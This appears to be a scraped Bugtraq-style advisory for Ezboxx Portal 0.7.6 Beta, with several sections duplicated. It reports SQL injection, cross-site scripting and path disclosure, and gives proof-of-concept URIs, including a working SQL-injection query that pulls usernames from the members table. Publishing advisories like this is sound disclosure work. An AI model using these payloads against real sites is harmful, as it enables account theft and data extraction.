Ezboxx Multiple Input Validation Vulnerabilities
BID:22029
Info
Ezboxx Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 22029 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 12 2007 12:00AM |
| Updated: | Jan 12 2007 12:00AM |
| Credit: | Doron P and Eyal G are credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Ezboxx Ezboxx Portal 0.7.6 Beta |
| Not Vulnerable: | |
Discussion
Ezboxx Multiple Input Validation Vulnerabilities
Ezboxx is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. The vulnerabilities include an SQL-injection issue, multiple cross-site scripting issues, and a path-disclosure issue.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, retrieve sensitive information, access or modify data, or exploit latent vulnerability in the underlying database implementation.
Ezboxx Portal System Beta v 0.7.6 and prior versions are vulnerable.
Ezboxx is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. The vulnerabilities include an SQL-injection issue, multiple cross-site scripting issues, and a path-disclosure issue.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, retrieve sensitive information, access or modify data, or exploit latent vulnerability in the underlying database implementation.
Ezboxx Portal System Beta v 0.7.6 and prior versions are vulnerable.
Exploit / POC
Ezboxx Multiple Input Validation Vulnerabilities
To exploit a cross-site scritping issue:
An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.
The following proof-of-concept URIs are available:
http://www.example.com/ezboxx/custom/piczoom.asp?pic=[XSS]
http://www.example.com/ezboxx/boxx/user-upload.asp?nocatname=[XSS] - Login required
http://www.example.com/ezboxx/indexes/newscomments.asp?iid=[XSS]
To exploit an SQL-injection issue:
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/ezboxx/boxx/ShowAppendix.asp?iid=convert(int,(select+TOP+1+username+from+members))
To exploit a path-disclosure issue:
An attacker can exploit this issue via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/ezboxx/boxx/knowledgebase.asp?iid=549&Cat=notnumber
http://www.example.com/ezboxx/boxx/knowledgebase.asp?iid=1&Cat=notnumber
To exploit a cross-site scritping issue:
An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.
The following proof-of-concept URIs are available:
http://www.example.com/ezboxx/custom/piczoom.asp?pic=[XSS]
http://www.example.com/ezboxx/boxx/user-upload.asp?nocatname=[XSS] - Login required
http://www.example.com/ezboxx/indexes/newscomments.asp?iid=[XSS]
To exploit an SQL-injection issue:
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/ezboxx/boxx/ShowAppendix.asp?iid=convert(int,(select+TOP+1+username+from+members))
To exploit a path-disclosure issue:
An attacker can exploit this issue via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/ezboxx/boxx/knowledgebase.asp?iid=549&Cat=notnumber
http://www.example.com/ezboxx/boxx/knowledgebase.asp?iid=1&Cat=notnumber
Solution / Fix
Ezboxx Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Ezboxx Multiple Input Validation Vulnerabilities
References:
References:
- Ezboxx multiple vulnerabilities (Doron P and Eyal G)
- Ezboxx Homepage (Ezboxx)